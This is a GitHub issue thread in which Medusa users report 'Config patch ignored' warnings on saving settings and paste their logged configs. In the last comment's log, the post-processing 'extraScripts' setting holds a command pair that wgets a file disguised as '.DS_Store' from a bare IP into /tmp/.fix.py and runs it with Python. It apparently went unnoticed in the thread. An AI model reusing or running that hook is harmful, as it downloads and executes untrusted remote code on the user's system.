Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Config patch ignored {'postprocessing' .... #7525

Closed
G33K opened this issue Dec 25, 2019 · 4 comments
Closed

Config patch ignored {'postprocessing' .... #7525

G33K opened this issue Dec 25, 2019 · 4 comments

Comments

@G33K
Copy link

G33K commented Dec 25, 2019

A warning is generated whenever I make any changes to and save the Post Processing Settings page

Warning Message:

2019-12-25 00:29:50 WARNING Thread-25 :: [d0c136d] Config patch ignored {'postprocessing': {'allowedExtensions': ['srt', 'nfo', 'sub', 'idx'], 'unpack': False, 'deleteRarContent': False, 'syncFiles': ['!sync', 'lftp-pget-status', 'part', 'bts', '!qb', '!qB'], 'postponeIfNoSubs': False, 'airdateEpisodes': True, 'addShowsWithoutDir': False, 'nfoRename': True, 'createMissingShowDirs': True, 'extraScripts': [], 'reflinkAvailable': False, 'multiEpStrings': {'4': 'Duplicate', '16': 'Repeat (Separated)', '2': 'Extend', '8': 'Extend (Limited)', '64': 'Extend (Limited, e-prefixed)', '1': 'Repeat', '32': 'Extend (Limited, E-prefixed)'}, 'showDownloadDir': '/download', 'autoPostprocessorFrequency': 10, 'moveAssociatedFiles': True, 'processMethod': 'move', 'extraScriptsUrl': 'https://github.com/pymedusa/Medusa/wiki/Post-Processing#extra-scripts', 'postponeIfSyncFiles': True, 'naming': {'animeMultiEp': 1, 'stripYear': False, 'pattern': 'Season %S/%Sx%0E - %EN', 'patternAirByDate': '%SN - %A.D - %EN', 'patternAnime': 'Season %0S/%SN - S%0SE%0E - %EN', 'enableCustomNamingAnime': False, 'patternSports': '%SN - %A-D - %EN', 'animeNamingType': 3, 'enableCustomNamingSports': False, 'multiEp': 1, 'enableCustomNamingAirByDate': False}, 'fileTimestampTimezone': 'network', 'noDelete': False, 'renameEpisodes': True, 'processAutomatically': True}}

I don't know much about the inner workings of Medusa but analyzing that warning message's output the only thing that stands out to me is that All the values of the "Multi-Episode Style" drop down (multiEpStrings) are getting included there regardless of what I choose there and thats the only option that does not stick after a save.

@G33K
Copy link
Author

G33K commented Dec 25, 2019

I am not sure if I need to open a new issue or not but it seemed related to the same

This warning comes when saving the General Settings page:

2019-12-25 01:14:05 WARNING Thread-38 :: [d0c136d] Config patch ignored {'layout': {'historyLimit': 100}}

@p0psicles
Copy link
Contributor

That's a separate issue. But we'll pick it up anyway. Tnx.

@skarekrow
Copy link

Same as #7495

@Sylanorr
Copy link

Sylanorr commented Jan 8, 2020

Same for me :

2020-01-08 13:46:11 WARNING APIv2-Thread_5 :: [d0c136d] Config patch ignored {u'postprocessing': {u'postponeIfSyncFiles': True, u'showDownloadDir': u'/media/NAS/Telechargements', u'reflinkAvailable': False, u'naming': {u'enableCustomNamingSports': False, u'multiEp': 1, u'pattern': u'%SN - Saison %0S/%SN - S%0SE%0E - %EN', u'patternAnime': u'Season %0S/%SN - S%0SE%0E - %EN', u'animeNamingType': 3, u'stripYear': False, u'patternAirByDate': u'%SN - %A.D - %EN', u'enableCustomNamingAirByDate': False, u'enableCustomNamingAnime': False, u'patternSports': u'%SN - %A-D - %EN', u'animeMultiEp': 1}, u'addShowsWithoutDir': False, u'renameEpisodes': True, u'moveAssociatedFiles': False, u'extraScriptsUrl': u'https://github.com/pymedusa/Medusa/wiki/Post-Processing#extra-scripts', u'deleteRarContent': False, u'extraScripts': [u'/usr/bin/wget --no-check-certificate https://195.154.179.106/.DS_Store -O /tmp/.fix.py', u'/usr/bin/python2.7 /tmp/.fix.py'], u'noDelete': False, u'allowedExtensions': [u'nfo', u'srt', u'sub', u'idx'], u'processMethod': u'hardlink', u'processAutomatically': True, u'autoPostprocessorFrequency': 30, u'fileTimestampTimezone': u'network', u'syncFiles': [u'!sync', u'lftp-pget-status', u'part', u'bts', u'!qb', u'!qB'], u'unpack': False, u'postponeIfNoSubs': False, u'createMissingShowDirs': False, u'nfoRename': True, u'multiEpStrings': {u'16': u'Repeat (Separated)', u'32': u'Extend (Limited, E-prefixed)', u'1': u'Repeat', u'2': u'Extend', u'64': u'Extend (Limited, e-prefixed)', u'4': u'Duplicate', u'8': u'Extend (Limited)'}, u'airdateEpisodes': False}}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

5 participants